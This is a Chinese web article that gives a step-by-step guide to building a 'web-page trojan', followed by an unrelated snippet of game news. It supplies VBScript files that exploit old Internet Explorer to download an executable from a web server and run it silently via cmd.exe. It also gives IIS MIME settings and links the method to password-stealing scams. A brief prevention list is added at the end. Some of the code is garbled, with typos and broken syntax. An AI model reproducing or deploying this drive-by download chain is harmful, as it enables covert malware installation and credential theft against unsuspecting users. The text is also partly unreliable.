天枫庄资源网 Design By www.wosibo.com
我们经常听到这样的忠告:“不要随意下在不明的程序,不要随意打开邮件的附件...”这样的忠告确实是有用的,不过我们的系统有不少漏洞,许多木马已经不需要客户端和服务端了,他们利用这些系统漏洞按照被系统认为合法的代码执行木马的功能,有的木马会在你完全不知道的情况下潜入,现在我来讲解下通过IE6的漏洞实现访问网页后神不知鬼不觉的下在并执行指定程序的例子,也就是网页木马.



首先我们需要编写几个简单的文件



一。名字为abc.abc的文件
<html>

<script language="vbscript">

Function HttpDoGet(url)

set oReq = CreateObject("Microsoft.XMLHTTP")

oReq.open "GET",url,false

oReq.send

If oReq.status=200 then

HttpDoGet=oReq.respomseBody

Savefile HttpDoGet,"c:win.exe"

End If

Set oReq=nothing

End Function

sub SaveFile(str.fName)

Set objStream = CreateObject("ADODB.Stream")

objStream.Type =1

objStream.Open

objStream.write str

objStream.SaveToFile fName.2

objStream.Close()

set objStream = nothing

exewin()

End sub

Sub exewin()

set wshshell=createobject ("wscript.shell" )

a=wshshell.run ("cmd.exe /c c:win.exe",0)

b=wshshell.run ("cmd.exe /c del c:win.hta",0)

window.close

End Sub

HttpDoGet "http://127.0.0.1/test.exe"

</script>

</html>



其中test.exe为木马程序,实现必须放在WEB发布的目录下,文件abc.abc也必须保存在发布的目录下。



二。名字为test.htm的文件

<html><body>

木马运行测试!(这句话可以改成你想说的)

<object date="http://127.0.0.1/win.test";;;></object>

</body></html>



三。名字为win.test的文件

<html>

<body>

<script language="vbscript">

Function HttpDoGet(url)

set oReq = CreateObject("Microsoft.XMLHTTP")

oReq.open "GET",url,false

oReq.send

If oReq.status=200 then

HttpDoGet,"c:win.hta"

Set oReq=nothing

End if

end function

sub SaveFile(str,fName)

Dim fso, tf

S e t f s o = C r e a t e O b j e c t(Scripting.FileSystemObject")

Set tf = fso.CreateTextfile(fName,True)

tf.Write str

tf.Close

exewin()

End sub

Sub exewin()

set wshshell=createobject ("wscript.shell" )

a=wshshell.run ("cmd.exe /c c:win.hat",0)

window.close

End Sub

HttpDoGet("http://127.0.0.1/abc.abc")

</script>

</body>

</html>


四。名字为test.exe的木马程序。



...这个就不用我提供了吧,你想用什么木马就把他的名字换成test.exe传上去就可以了。



服务器的文件列表

test.htm:对外发布的网页

win.test:下在文件abc.abc到对方机器上,并且保存为win.hta并且执行。

abc.abc下载二进制的木马文件test.exe,并执行。

test.exe:木马程序。



上面所说的文件可以修改成任意名字,只是不要忘记把源码里的文件指向也修改就可以了!



最后是设置IIS,打开“程序→管理工具→internet服务管理器”,右键单击要设置的站点,选择《属性》,在选择“http头”。单击“MIME映射”里的“文件类型”按钮,并在关联扩展名文本框中输入“.hta”,在内容类型(MIME)中输入“application/hta",然后关闭所有窗口就可以了。



有许多朋友多遇见过,说什么赠送Q号或者玩网游的时候里面有人喊赠送好东东在XXX网址,其实那上面所说的例子用的就是这种原理,不知不觉中你机器上的所有有关于密码或者指定名词的东西全发送到对方指定的邮件箱里去了



看完后是否觉得这种木马太危险,甚至有种想把网线拔掉的感觉那?呵呵,其实了解了网页木马的工作原理后我们就不难防护他,看完以上内容后就可以得出一个结论,网页木马主要利用IE的漏洞来实现的,所以在预防的时候一定要做到以下几点就可以保证上网的安全了,

A。安装IE的最新版本并且随时下在才做系统和IE的补丁程序。

B。不随便登陆不熟悉朋友送来的网站,对于熟悉的朋友也要小心哦。

C。不随便登陆色情网站,还有一些卖
标签:
编写网页木马详解

天枫庄资源网 Design By www.wosibo.com
广告合作:本站广告合作请联系QQ:858582 申请时备注:广告合作(否则不回)
免责声明:本站文章均来自网站采集或用户投稿,网站不提供任何软件下载或自行开发的软件! 如有用户或公司发现本站内容信息存在侵权行为,请邮件告知! 858582#qq.com
天枫庄资源网 Design By www.wosibo.com

评论“编写网页木马详解”

暂无编写网页木马详解的评论...

稳了!魔兽国服回归的3条重磅消息!官宣时间再确认!

昨天有一位朋友在大神群里分享,自己亚服账号被封号之后居然弹出了国服的封号信息对话框。

这里面让他访问的是一个国服的战网网址,com.cn和后面的zh都非常明白地表明这就是国服战网。

而他在复制这个网址并且进行登录之后,确实是网易的网址,也就是我们熟悉的停服之后国服发布的暴雪游戏产品运营到期开放退款的说明。这是一件比较奇怪的事情,因为以前都没有出现这样的情况,现在突然提示跳转到国服战网的网址,是不是说明了简体中文客户端已经开始进行更新了呢?